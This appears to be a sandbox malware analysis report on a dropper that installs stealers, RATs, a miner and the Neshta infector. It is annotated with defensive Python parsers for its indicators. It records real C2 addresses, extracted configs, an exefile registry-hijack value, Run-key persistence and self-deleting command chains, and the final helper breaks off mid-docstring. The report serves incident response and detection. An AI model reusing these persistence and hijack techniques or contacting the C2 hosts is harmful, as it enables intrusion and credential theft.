Analysis
-
max time kernel
299s -
max time network
301s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64 arch:x86 image:win10v2004-20231222-en locale:en-us os:windows10-2004-x64 system -
submitted
29-01-2024 12:18
Static task
static1
Behavioral task
behavioral1
Sample
4363463463464363463463463.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
4363463463464363463463463.exe
Resource
win10-20231220-en
Behavioral task
behavioral3
Sample
4363463463464363463463463.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral4
Sample
4363463463464363463463463.exe
Resource
win11-20231215-en
General
-
Target
4363463463464363463463463.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Extracted
stealc
http://185.172.128.79
-
url_path
/3886d2276f6914c4.php
Extracted
xworm
91.92.249.37:9049
aMtkXNimPlkESDx9
Extracted
amadey
4.17
http://5.42.66.29
-
install_dir
f60f0ba310
-
install_file
Dctooux.exe
-
strings_key
f34f781563773d1d56ad6459936524d1
-
url_paths
/b9djjcaSed/index.php
Extracted
asyncrat
Default
38.181.25.204:5858
ifyviyeiimfgf
-
delay
1
-
install
false
-
install_folder
%AppData%
Extracted
amadey
4.15
http://185.172.128.63
-
install_dir
6187fcb526
-
install_file
Dctooux.exe
-
strings_key
cd3b2619c9009c441355ae581d53163e
-
url_paths
/v8sjh3hs8/index.php
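The extracted configs above are the most directly actionable part of the report, but the C2 host and its URL path are split across separate lines per family. The following parser is an added example (not part of the report or of any of the malware families' code): it takes the "Extracted" stanzas in the layout shown above, reassembles each stanza's host and path into a full C2 URL, and emits one blockable (family, kind, value) tuple per C2. The input string is the first four stanzas of this report copied verbatim; the stanza layout rules (a line of "-" introduces a key/value pair, a bare dotted number is a version, anything else is a key or mutex string) are assumptions drawn from this page's rendering.

```python
import re
from urllib.parse import urljoin

# The first four "Extracted" stanzas from this report, copied verbatim as parser input.
CONFIG_TEXT = """
Extracted
stealc
http://185.172.128.79
-
url_path
/3886d2276f6914c4.php
Extracted
xworm
91.92.249.37:9049
aMtkXNimPlkESDx9
Extracted
amadey
4.17
http://5.42.66.29
-
install_dir
f60f0ba310
-
install_file
Dctooux.exe
-
strings_key
f34f781563773d1d56ad6459936524d1
-
url_paths
/b9djjcaSed/index.php
Extracted
asyncrat
Default
38.181.25.204:5858
ifyviyeiimfgf
-
delay
1
-
install
false
-
install_folder
%AppData%
"""

URL_RE = re.compile(r"^https?://\S+$")
SOCKET_RE = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}:\d{1,5}$")
VERSION_RE = re.compile(r"^\d+(?:\.\d+)+$")


def parse_extracted_configs(text):
    """Split the report's 'Extracted' stanzas into dicts (layout assumed from this page)."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    stanzas, current, i = [], None, 0
    while i < len(lines):
        line = lines[i]
        if line == "Extracted" and i + 1 < len(lines):
            current = {"family": lines[i + 1], "version": None, "c2": [], "fields": {}, "extra": []}
            stanzas.append(current)
            i += 2
            continue
        if current is None:
            i += 1
            continue
        if line == "-" and i + 2 < len(lines):      # "-" introduces a key line then a value line
            current["fields"][lines[i + 1]] = lines[i + 2]
            i += 3
            continue
        if URL_RE.match(line) or SOCKET_RE.match(line):
            current["c2"].append(line)
        elif VERSION_RE.match(line) and current["version"] is None:
            current["version"] = line
        else:                                        # campaign name, mutex or key material
            current["extra"].append(line)
        i += 1
    return stanzas


def network_iocs(stanzas):
    """Resolve each stanza to blockable (family, kind, value) tuples."""
    iocs = []
    for s in stanzas:
        paths = []
        for key in ("url_path", "url_paths"):        # both spellings occur in this report
            if key in s["fields"]:
                paths += [p for p in re.split(r"[,\s]+", s["fields"][key]) if p]
        for c2 in s["c2"]:
            if SOCKET_RE.match(c2):
                iocs.append((s["family"], "tcp", c2))
            else:
                for p in paths or [""]:
                    iocs.append((s["family"], "url", urljoin(c2, p)))
    return iocs


if __name__ == "__main__":
    for ioc in network_iocs(parse_extracted_configs(CONFIG_TEXT)):
        print("%-9s %-4s %s" % ioc)
```

The tuples are what you feed to a proxy blocklist or a network detection; the remaining fields (install_dir, install_file, strings_key) stay in each stanza's `fields` dict for host-based hunting, e.g. the Amadey install_file Dctooux.exe that shows up again below as a dropped executable and a Windows\Tasks job.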
Signatures
-
DcRat
DarkCrystal (DCRat) is a .NET RAT, active since June 2019, that can load additional plugins.
-
Detect Lumma Stealer payload V2 1 IoCs
Processes:
yara_rule family_lumma_V2: C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe
-
Detect Lumma Stealer payload V4 1 IoCs
Processes:
yara_rule family_lumma_v4: C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe
-
Detect Neshta payload 1 IoCs
Processes:
yara_rule family_neshta: C:\DRIVER~1\436346~1.EXE
-
Detect Xworm Payload 2 IoCs
Processes:
yara_rule family_xworm: behavioral3/memory/2976-173-0x0000000000860000-0x0000000000876000-memory.dmp
yara_rule family_xworm: C:\Users\Admin\AppData\Local\Temp\Files\first.exe
-
Detect ZGRat V1 1 IoCs
Processes:
yara_rule family_zgrat_v1: C:\Users\Admin\AppData\Roaming\configurationValue\Logs.exe
-
Neshta
Neshta is a file infector: it writes itself into other executables so that launching any of them runs the infector first. In this run it shows up as C:\Windows\svchost.com and C:\Windows\directx.sys, as the exefile\shell\open\command hijack that routes every .exe launch through svchost.com, and as the mass "opened for modification" of .exe files under Program Files by stub.exe. C:\DRIVER~1\436346~1.EXE is the 8.3 short name of C:\DriverHostCrtNet\4363463463464363463463463.exe, which is why the same file matches both family_neshta and dcrat.
-
Process spawned unexpected child process 39 IoCs
This typically indicates the parent process was compromised via an exploit or macro. Here the parent is WmiPrvSE.exe, which is also the parent a process gets when it is started through WMI (Win32_Process.Create), so these 39 schtasks.exe launches are consistent with the sample creating its scheduled tasks over WMI rather than with an exploited WMI provider host. Either way, WmiPrvSE.exe spawning schtasks.exe is worth a detection on its own.
Processes:
Parent C:\Windows\system32\wbem\wmiprvse.exe (pid 668) is not expected to spawn schtasks.exe; child pids, in order of appearance: 4636, 4680, 1092, 620, 844, 464, 3260, 3168, 1724, 2172, 1544, 4432, 2628, 3976, 3112, 3148, 3132, 2484, 1724, 4868, 1464, 3848, 4092, 4800, 4252, 2784, 4272, 1304, 1884, 3420, 4464, 2628, 2544, 3472, 2380, 2848, 5088, 544, 4248 (pids 1724 and 2628 each appear twice, i.e. were reused during the run).
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
Processes:
yara_rule family_redline: C:\Users\Admin\AppData\Roaming\configurationValue\Logs.exe
yara_rule family_redline: C:\Users\Admin\AppData\Roaming\configurationValue\olehps.exe
-
Async RAT payload 1 IoCs
Processes:
yara_rule asyncrat: behavioral3/memory/1636-187-0x000001DBD5A60000-0x000001DBD5A78000-memory.dmp
-
DcRat payload (yara rule dcrat) 14 IoCs
Processes:
yara_rule dcrat: C:\Users\Admin\AppData\Local\Temp\Files\fund.exe (matched 3 times)
yara_rule dcrat: C:\DriverHostCrtNet\comSvc.exe (matched 2 times)
yara_rule dcrat: behavioral3/memory/3120-114-0x0000000000550000-0x0000000000716000-memory.dmp
yara_rule dcrat: C:\Program Files\Uninstall Information\dwm.exe
yara_rule dcrat: C:\Program Files\Uninstall Information\RCX85EE.tmp
yara_rule dcrat: behavioral3/memory/3132-419-0x0000000000400000-0x00000000004CE000-memory.dmp
yara_rule dcrat: C:\Program Files\Windows Security\BrowserCore\smss.exe
yara_rule dcrat: C:\odt\WmiPrvSE.exe
yara_rule dcrat: C:\DriverHostCrtNet\4363463463464363463463463.exe (matched 2 times)
yara_rule dcrat: C:\DRIVER~1\436346~1.EXE
Pid 3120 is the dropped find.exe, the same process that creates the dwm.exe and taskhostw.exe copies listed under "Drops file in Program Files directory" and "Drops file in Windows directory"; the DcRat copies are named after system binaries but live outside System32, so match on full path and hash, not on image name.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (lada.exe)
-
Blocklisted process makes network request 3 IoCs
Processes:
flow 123, pid 6016 rundll32.exe
flow 134, pid 1796 rundll32.exe
flow 200, pid 1464 WScript.exe
-
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
Processes:
File opened for modification C:\Windows\System32\drivers\etc\hosts (find.exe)
This is the hosts file, not a driver: writing to it lets the malware redirect or block name resolution for hosts of its choosing, so diff it against a clean copy during remediation.
-
Stops running service(s) 3 TTPs
-
.NET Reactor protector 10 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
Processes:
yara_rule net_reactor: behavioral3/memory/1732-{929,931,935,939,941,944,946,948,950,952}-0x0000000005870000-0x0000000005A15000-memory.dmp (ten dumps of the same region of pid 1732, alex.exe)
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (lada.exe)
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion (lada.exe)
-
Checks computer location settings 2 TTPs 26 IoCs
Looks up the country code configured in the registry, likely for geofencing (refusing to run in certain locales).
Processes:
Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation by: stub.exe (10 times), 4363463463464363463463463.exe (2 times), cmd.exe (2 times), Opolis.exe, InstallSetup.exe, first.exe, dusers.exe, WScript.exe, Dctooux.exe, RegAsm.exe, Logs.exe, svchost.com, 15C633~1.EXE, Users.exe, build1234.exe (26 queries in total)
-
Executes dropped EXE 64 IoCs
Processes:
pid process
4276 crypted.exe
2364 networa.exe
2224 powershell.exe
1332 Conhost.exe
4960 InstallSetup.exe
3968 u3ts.0.exe
1636 svchost1.exe
2948 Conhost.exe
3120 find.exe
4072 i.exe
2976 first.exe
3016 u3ts.1.exe
1356 ofg7d45fsdfgg312.exe
2876 dusers.exe
2648 Users.exe
244 wmild.exe
396 wmild.exe
1152 ama.exe
1692 minuscrypt_crypted.exe
2888 wmild.exe
1052 wmild.exe
5184 4363463463464363463463463.exe
5900 wmild.exe
5880 wmild.exe
4408 Dctooux.exe
5436 4363463463464363463463463.exe
1832 baseline.exe
1732 alex.exe
6108 build1234.exe
6036 olehps.exe
5584 Logs.exe
1592 Machinegggg.exe
2332 TrueCrypt_lXNcTC.exe
1676 WatchDog.exe
1680 qemu-ga.exe
5288 Opolis.exe
4980 lada.exe
4644 XMRig.exe
2644 2-3-1_2023-12-14_13-35.exe
5732 uwgxswmtctao.exe
3052 OSM-Client.exe
5788 stub.exe
5808 svchost.exe
1932 stub.exe
2004 svchost.exe
1016 stub.exe
380 svchost.exe
5448 stub.exe
5328 svchost.com
4280 svchost.com
2912 svchost.com
1652 svchost.com
5576 15C633~1.EXE
5900 stub.exe
3684 svchost.com
5376 stub.exe
3692 svchost.com
5168 tel.exe
2252 svchost.com
5968 fcc.exe
2784 svchost.com
3044 jjj.exe
1456 svchost.com
2628 stub.exe
Every entry here is a dropped file, so the powershell.exe, Conhost.exe, svchost.exe and find.exe instances are not the Windows binaries of those names. Pid 5900 is listed for both wmild.exe and stub.exe (pid reuse).
-
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer that runs Windows applications on other operating systems and is sometimes used as a sandbox environment; checking for its registry key is an anti-analysis test.
Processes:
Key opened \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Wine (lada.exe)
-
Loads dropped DLL 60 IoCs
Processes:
pid process
1152 ama.exe
4488 rundll32.exe
6016 rundll32.exe
1796 rundll32.exe
3052 OSM-Client.exe (56 loads)
-
Modifies system executable filetype association 2 TTPs 1 IoCs
Processes:
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" (stub.exe)
This is the Neshta hijack: the stock value is "%1" %*, so after this change every .exe launched through the shell is first run by C:\Windows\svchost.com with the real target as %1. Restore the value before deleting svchost.com, or no executable will start.
-
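A quick way to triage this key on a suspect host, and to reason about the value exactly as the report prints it, is the following added example (my code, not part of the report or of any tool it mentions). It unescapes the report's C-style rendering of the REG_SZ data, classifies the command as stock or hijacked and extracts the launcher that was inserted in front of "%1"; on Windows it can also read the live value from HKLM or HKCU. The sample value is the one from this report; the HKCU check is there because HKCU\Software\Classes overrides HKLM\Software\Classes in the merged HKCR view.

```python
import re
import sys

KEY_PATH = r"SOFTWARE\Classes\exefile\shell\open\command"
DEFAULT_EXEFILE_COMMAND = '"%1" %*'          # stock value on a clean Windows install
ESCAPE_RE = re.compile(r'\\(["\\])')          # \"  ->  "    and    \\  ->  \
FIRST_TOKEN_RE = re.compile(r'^\s*(?:"([^"]+)"|(\S+))')


def unescape_report_value(rendered):
    """Turn the report's C-style rendering of REG_SZ data back into the raw registry string."""
    if len(rendered) >= 2 and rendered[0] == rendered[-1] == '"':
        rendered = rendered[1:-1]
    return ESCAPE_RE.sub(r"\1", rendered)


def classify_exefile_command(value):
    """Return ('clean', None) for the stock value, else ('hijacked', <launcher inserted before %1>)."""
    value = value.strip()
    if re.fullmatch(r'"%1"\s+%\*', value):
        return ("clean", None)
    m = FIRST_TOKEN_RE.match(value)
    launcher = (m.group(1) or m.group(2)) if m else value
    return ("hijacked", launcher)


def read_live_exefile_command(hive_name="HKLM"):
    """Read the live default value on Windows; None on other platforms or if the key is absent."""
    if sys.platform != "win32":
        return None
    import winreg
    hive = winreg.HKEY_LOCAL_MACHINE if hive_name == "HKLM" else winreg.HKEY_CURRENT_USER
    try:
        with winreg.OpenKey(hive, KEY_PATH) as key:
            return winreg.QueryValueEx(key, "")[0]
    except FileNotFoundError:
        return None                       # HKCU normally has no exefile override at all


if __name__ == "__main__":
    reported = r'"C:\\Windows\\svchost.com \"%1\" %*"'     # value as printed in this report
    print("report value:", classify_exefile_command(unescape_report_value(reported)))
    for hive in ("HKLM", "HKCU"):
        live = read_live_exefile_command(hive)
        if live is not None:
            print(hive, live, classify_exefile_command(live))
```

A hijacked verdict means the launcher path is what actually runs on every double-click; collect that file (here C:\Windows\svchost.com) for analysis, then write DEFAULT_EXEFILE_COMMAND back into the key before removing it.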
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
UPX packed file 8 IoCs
Processes:
yara_rule upx: behavioral3/memory/2648-266-0x0000000000400000-0x0000000000442000-memory.dmp
yara_rule upx: behavioral3/memory/2648-351-0x0000000000400000-0x0000000000442000-memory.dmp
yara_rule upx: C:\Users\Admin\AppData\Local\Temp\Files\Users.exe (matched 2 times)
yara_rule upx: behavioral3/memory/2876-229-0x0000000000400000-0x0000000000440000-memory.dmp
yara_rule upx: behavioral3/memory/2876-313-0x0000000000400000-0x0000000000440000-memory.dmp
yara_rule upx: C:\Users\Admin\AppData\Local\Temp\Files\dusers.exe (matched 2 times)
(pid 2648 is Users.exe and pid 2876 is dusers.exe, per "Executes dropped EXE")
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
Key opened \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (build1234.exe)
Key opened \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (build1234.exe)
Key opened \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (build1234.exe)
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\first = "C:\\Users\\Admin\\AppData\\Roaming\\first.exe" (first.exe)
Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winsvcr = "C:\\Users\\Admin\\AppData\\Roaming\\Macromedia\\svr.vbs" (reg.exe)
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\winsvcr = "C:\\Users\\Admin\\AppData\\Roaming\\Macromedia\\svr.vbs" (reg.exe)
Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\A_second_wind_for_important_cases = "C:\\Users\\Admin\\AppData\\Local\\A_second_wind_for_important_cases\\A_second_wind_for_important_cases.exe" (powershell.exe)
The svr.vbs entry is written to both the per-user and the machine-wide (WOW6432Node) Run key by reg.exe, so cleaning only HKCU leaves it in place.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
Processes:
flow 46 raw.githubusercontent.com
flow 160 raw.githubusercontent.com
flow 8 bitbucket.org
flow 9 bitbucket.org
flow 45 raw.githubusercontent.com
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow 48 ip-api.com
flow 157 ip-api.com
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
Processes:
yara_rule autoit_exe: C:\Users\Admin\AppData\Local\Temp\Files\networa.exe
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
pid process
4276 crypted.exe
4980 lada.exe
-
Suspicious use of SetThreadContext 8 IoCs
Processes:
PID 1692 minuscrypt_crypted.exe set thread context of 3132 AppLaunch.exe
PID 1152 ama.exe set thread context of 516 RegSvcs.exe
PID 1732 alex.exe set thread context of 1800 RegAsm.exe
PID 1592 Machinegggg.exe set thread context of 4920 ADelRCP.exe
PID 2332 TrueCrypt_lXNcTC.exe set thread context of 4260 jsc.exe
PID 5732 uwgxswmtctao.exe set thread context of 1400 explorer.exe
PID 5168 tel.exe set thread context of 5424 vbc.exe
PID 3044 jjj.exe set thread context of 2612 vbc.exe
SetThreadContext on a freshly started .NET host (AppLaunch.exe, RegSvcs.exe, RegAsm.exe, jsc.exe, vbc.exe) or on explorer.exe is the process-hollowing pattern: the payload runs under the signed host's name. The dcrat yara match in memory of pid 3132 (behavioral3/memory/3132-419-...) is consistent with the AppLaunch.exe injection on the first line.
-
Drops file in Program Files directory 64 IoCs
Processes:
File opened for modification C:\PROGRA~3\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE (stub.exe)
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\msedge.exe (stub.exe)
File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\MicrosoftEdgeUpdate.exe (stub.exe)
File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13181~1.5\MICROS~4.EXE (stub.exe)
File opened for modification C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\ADOBEA~1.EXE (stub.exe)
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~4.EXE (stub.exe)
File opened for modification C:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXE (stub.exe)
File opened for modification C:\PROGRA~2\INTERN~1\ielowutil.exe (stub.exe)
File created C:\Program Files (x86)\Mozilla Maintenance Service\logs\1f93f77a7f4778 (find.exe)
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroRd32.exe (stub.exe)
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROBR~1.EXE (stub.exe)
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~2.EXE (stub.exe)
File opened for modification C:\PROGRA~2\WINDOW~3\ACCESS~1\wordpad.exe (stub.exe)
File opened for modification C:\PROGRA~2\WI8A19~1\ImagingDevices.exe (stub.exe)
File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13181~1.5\MI9C33~1.EXE (stub.exe)
File opened for modification C:\PROGRA~2\WINDOW~2\wab.exe (stub.exe)
File opened for modification C:\PROGRA~2\WINDOW~4\wmprph.exe (stub.exe)
File opened for modification C:\PROGRA~3\PACKAG~1\{33D1F~1\VCREDI~1.EXE (stub.exe)
File opened for modification C:\Program Files (x86)\Windows Mail\RCX9FD5.tmp (find.exe)
File opened for modification C:\PROGRA~2\INTERN~1\ielowutil.exe (stub.exe)
File opened for modification C:\PROGRA~2\MOZILL~1\logs\MOUSOC~1.EXE (stub.exe)
File opened for modification C:\PROGRA~2\WINDOW~4\wmpshare.exe (stub.exe)
File opened for modification C:\PROGRA~3\PACKAG~1\{4D8DC~1\VC_RED~1.EXE (stub.exe)
File opened for modification C:\Program Files\Uninstall Information\dwm.exe (find.exe)
File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13181~1.5\MI391D~1.EXE (stub.exe)
File opened for modification C:\PROGRA~3\PACKAG~1\{4D8DC~1\VC_RED~1.EXE (stub.exe)
File opened for modification C:\PROGRA~3\PACKAG~1\{EF6B0~1\VCREDI~1.EXE (stub.exe)
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\ELEVAT~1.EXE (stub.exe)
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe (stub.exe)
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~3.EXE (stub.exe)
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroRd32.exe (stub.exe)
File opened for modification C:\PROGRA~2\Google\Update\DISABL~1.EXE (stub.exe)
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~1.EXE (stub.exe)
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\IDENTI~1.EXE (stub.exe)
File opened for modification C:\PROGRA~2\WINDOW~4\setup_wm.exe (stub.exe)
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADelRCP.exe (stub.exe)
File opened for modification C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\java.exe (stub.exe)
File opened for modification C:\Program Files (x86)\Windows Mail\RCX9FD4.tmp (find.exe)
File opened for modification C:\Program Files\Windows Security\BrowserCore\RCX9B4D.tmp (find.exe)
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\arh.exe (stub.exe)
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\Eula.exe (stub.exe)
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~3.EXE (stub.exe)
File opened for modification C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE (stub.exe)
File opened for modification C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE (stub.exe)
File created C:\Program Files (x86)\Windows Mail\networa.exe (find.exe)
File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\logs\MoUsoCoreWorker.exe (find.exe)
File opened for modification C:\PROGRA~3\PACKAG~1\{FB050~1\WINDOW~1.EXE (stub.exe)
File opened for modification C:\PROGRA~3\PACKAG~1\{61087~1\VCREDI~1.EXE (stub.exe)
File opened for modification C:\PROGRA~2\WINDOW~2\wabmig.exe (stub.exe)
File opened for modification C:\PROGRA~2\WINDOW~4\wmpconfig.exe (stub.exe)
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroCEF\RdrCEF.exe (stub.exe)
File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13181~1.5\MICROS~1.EXE (stub.exe)
File opened for modification C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jaureg.exe (stub.exe)
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~1.EXE (stub.exe)
File opened for modification C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE (stub.exe)
File opened for modification C:\PROGRA~2\WINDOW~2\wab.exe (stub.exe)
File opened for modification C:\PROGRA~3\PACKAG~1\{61087~1\VCREDI~1.EXE (stub.exe)
File created C:\Program Files\Uninstall Information\dwm.exe (find.exe)
File opened for modification C:\Program Files\Uninstall Information\RCX85EE.tmp (find.exe)
File opened for modification C:\PROGRA~2\WINDOW~4\wmplayer.exe (stub.exe)
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE (stub.exe)
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~2.EXE (stub.exe)
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\LOGTRA~1.EXE (stub.exe)
File opened for modification C:\PROGRA~2\INTERN~1\iexplore.exe (stub.exe)
The 55 stub.exe entries, all .exe files addressed by 8.3 short names, are the Neshta infector walking Program Files; every one of those binaries must be treated as infected. The find.exe entries (dwm.exe, networa.exe, MoUsoCoreWorker.exe and the RCX*.tmp staging files) are the DcRat drops.
-
Drops file in Windows directory 57 IoCs
Processes:
File opened for modification C:\Windows\directx.sys (stub.exe 10 times, svchost.com 14 times)
File opened for modification C:\Windows\svchost.com (stub.exe 11 times, svchost.com 14 times)
File created C:\Windows\svchost.exe (stub.exe, 2 times)
File created C:\Windows\Tasks\Dctooux.job (Conhost.exe)
File created C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\pris\taskhostw.exe (find.exe)
File opened for modification C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\pris\taskhostw.exe (find.exe)
File created C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\pris\ea9f0e6c9e2dcd (find.exe)
File opened for modification C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\pris\RCX8F2C.tmp (find.exe)
File opened for modification C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\pris\RCX8F2D.tmp (find.exe)
(57 events in total: the directx.sys and svchost.com churn is the Neshta infector, Dctooux.job is the scheduled-task file for the Amadey install_file Dctooux.exe from the extracted config, and the taskhostw.exe copy under SystemApps is another DcRat drop named after a system binary)
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
sc.exe
pid  process
1652 sc.exe
5576 sc.exe
5616 sc.exe
5972 sc.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 8 IoCs
Processes:
WerFault.exe
pid  pid_target  process  target process
2500  1332  WerFault.exe  NBYS%20AH.NET.exe
1692  4960  WerFault.exe  InstallSetup.exe
4272  1692  WerFault.exe  minuscrypt_crypted.exe
848  2644  WerFault.exe  2-3-1_2023-12-14_13-35.exe
5596  1676  WerFault.exe  WatchDog.exe
1804  5168  WerFault.exe  tel.exe
5972  3044  WerFault.exe  jjj.exe
2864  3968  WerFault.exe  u3ts.0.exe
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
u3ts.0.exe
description  ioc  process
Key opened  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0  u3ts.0.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  u3ts.0.exe
-
Creates scheduled task(s) 1 TTPs 41 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
SCHTASKS.exe, schtasks.exe
pid  process  (41 entries, all schtasks.exe unless noted)
1300 (SCHTASKS.exe), 2628, 244, 4252, 464, 4432, 4868, 1884, 3168, 3976, 2484, 3420, 2628, 2848, 620, 1092, 1724, 1544, 3148, 3132, 3848, 2380, 4680, 544, 4092, 5088, 1724, 844, 3112, 1304, 2544, 4636, 1464, 4272, 3472, 4248, 3260, 4800, 2784, 4464, 2172
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exe
pid  process
4364 timeout.exe
-
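The schtasks and timeout signatures above only list PIDs; the command lines behind them sit in the process tree later in this report (the `schtasks /create /tn "MalayamaraUpdate" ... /sc minute /mo 30 /F` call, the `choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"` chain and the `timeout /t 3 > NUL && DEL ...` chain that removes build1234.exe). The Python below is an added example by the editor, not part of the sandbox report or its tooling: it tokenises command lines of that shape, parses the `schtasks /create` options, and flags the delay-then-delete self-removal pattern. The three malicious command lines in SAMPLES are copied from this report, the NightlyBackup line is constructed as a benign control, and the helper names and the USER_WRITABLE path list are assumptions.

```python
"""Command-line triage for two behaviours recorded in this report: scheduled-task
persistence via 'schtasks /create' and delay-then-delete self-removal chains
(timeout/choice/ping used as a sleep before del). Editor's example, not part of
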